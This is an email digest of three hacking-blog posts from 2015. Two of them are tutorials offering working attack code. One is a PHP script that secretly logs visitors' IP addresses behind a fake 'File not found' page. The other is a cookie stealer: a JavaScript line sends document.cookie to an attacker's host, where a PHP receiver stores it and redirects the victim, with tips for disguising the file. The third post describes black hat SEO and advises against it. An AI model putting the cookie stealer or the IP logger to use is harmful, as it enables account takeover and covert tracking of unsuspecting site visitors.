#Technology |
- How to steal IP address Using Ip Catcher Script
- How To Make A Cookie Stealer Php script ?
- What is Black Hat Seo ?
How to steal IP address Using Ip Catcher Script Posted: 15 Oct 2015 08:29 AM PDT Finding out someone’s IP address is like finding their phone number, an IP address can be used to find the general location. Now most of the tutorials on the internet teach you how to steal an ip address via MSN/Yahoo messenger, or any other chat software, in this post I will show you how to find IP address of someones computer using Ip Catcher script. Using this method for hacking someones ip address is very easy and effectively, so just follow the steps bellow. How to Hack Someones IP Address ? Code – get.php : <html> <?php $file = "ips.txt"; $f=fopen($file, 'a'); fwrite($f,$_SERVER['REMOTE_ADDR']."\n"); fclose($f); ?> <p>File not found</p> </body> </html> 1.) First of all you need to make a new .txt document on the website you’re uploading this to. Name it ips.txt (You can change that in the script aswell where it says $file = ‘ips.txt’; in the second line. Then change the CHMOD to 777. 2.) Now you need to past the script above in to a get.php document, and upload it. 3.) Now you make people visit your site, and they will see only ” File Not Found ” ! 4.) To view the IP, you simply add “/ips.txt” after your domain, and you’ll see the IP. IMPORTANT NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk. The post How to steal IP address Using Ip Catcher Script appeared first on Madhnw0rm. |
How To Make A Cookie Stealer Php script ? Posted: 15 Oct 2015 06:20 AM PDT
Hey W0rm readers,I am with new tutorial,that How To Make A Cookie Stealer Php script ? A cookie stealer is used to steal the login information of any unsuspecting victim. Once the link is visited, the cookie of the user is taken and stored in a text file. They are then redirected to another page without knowing what has just happened. This cookie stealer will be made using PHP, so to begin with you will need a free host with PHP support. A cookie stealer is made up of a sender and a receiver. The sender is done using JavaScript so will work on almost any site providing the user has JavaScript turned on. The receiver is placed on your site and takes the cookie from the JavaScript cookie sender. Here is the receiver code for your PHP file Requirements:
There are two components in a cookie stealer and they are the sender and the receiver. The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a Php document, most commonly found residing on some obscure webserver. Php Coding a receiver is the part. Only two things are needed to make a receiver : a webhost/ftp which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts). As I said, the receiver’s job is to receive the cookie from the sender. Once the receiver has the cookie, it needs a way to get that cookie to you. <?php $cookie = $HTTP_GET_VARS["c"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie . "\n\n"); echo "<script>location.href='http://www.google.com';</script>"; ?> Line 1:- tells the server that this is indeed a PHP document. There are 3 parts of this code that are highlighted. The first is the letter “c”, this is the name of get command the PHP file uses to get the cookie (/script.php?c=…) If you are trying to hide what the script is doing, this can be called anything. If you change this though, the script below must be changed to fit. The second and third are the name of the log file it creates when the cookie is received and where it redirects the user to after the log file has been stored. Another One is Javascript Reciever the code is here :- <script language="JavaScript"> document.location= "http://www.yoursite.com/stealer.php?c=" + document.cookie; </script> It would be a lot better to name the PHP page to look like part of the site your are infecting e.g. out.php maybe. That’s all there is to building a basic cookie stealer. If you want to go more advanced and have a host with sendmail enabled you could make the script email you the cookie log as soon as it arrives. Important Note: Following Materials are Educational Purpose Only, Madhnw0rm Won’t Take Response For Your Actions
The post How To Make A Cookie Stealer Php script ? appeared first on Madhnw0rm. |
Posted: 15 Oct 2015 05:53 AM PDT In search engine optimization (SEO) terminology, black hat SEO refers to the use of aggressive SEO strategies, techniques and tactics that focus only on search engines and not a human audience, and usually does not obey search engines guidelines. The various ways of doing Black Hat SEO are :- Doorway pages :- This technique is against the ethical SEO rules. Doorway pages are the pages that are can be seen by the search engine spiders but are invisible to the generally visitors. They are used only to get higher rankings in the search engines by tricking them. It is not a good way because it hurts the visitors who visit to the site to see some quality content but what they see is the keyword stuffed pages. Cloaking :- This method is used to cheat the search engines in order to get good ranks ion the search engines. It is done to get good rank for certain keywords. A user identified as search engine is shown a specifically prepared and optimized website with only purpose to rank well for desired keywords. If a user is not a search engine they are presented with the "real" websites content which is often spammed and of lesser quality. RSS Spamming: Now a day's many people use their RSS freed in comments instead of their blog's URL. What it does is that if some visitor only wants to visit your blog to see it but due to RSS spamming he has to subscribe to your freed. By doing this their IP can be black listed from any site in a click. Black hat SEO is not a good idea. Because Search Engine Spiders can catch you and your site can be banned from various search engine rankings. It may look like a good idea in the initial stages but for the long run it is not good at all. Black Hat is an unfair mean of practicing SEO because it does not follow the rules and regulations followed by the ethical SEO. Black hat make search engine spiders and general visitors to visit the sites which are having poor content. This gives not a very pleasant experience to the visitors. So Black hat practice should not be used. The post What is Black Hat Seo ? appeared first on Madhnw0rm. |
You are subscribed to email updates from Madhnw0rm. To stop receiving these emails, you may unsubscribe now. | Email delivery powered by Google |
Google Inc., 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States |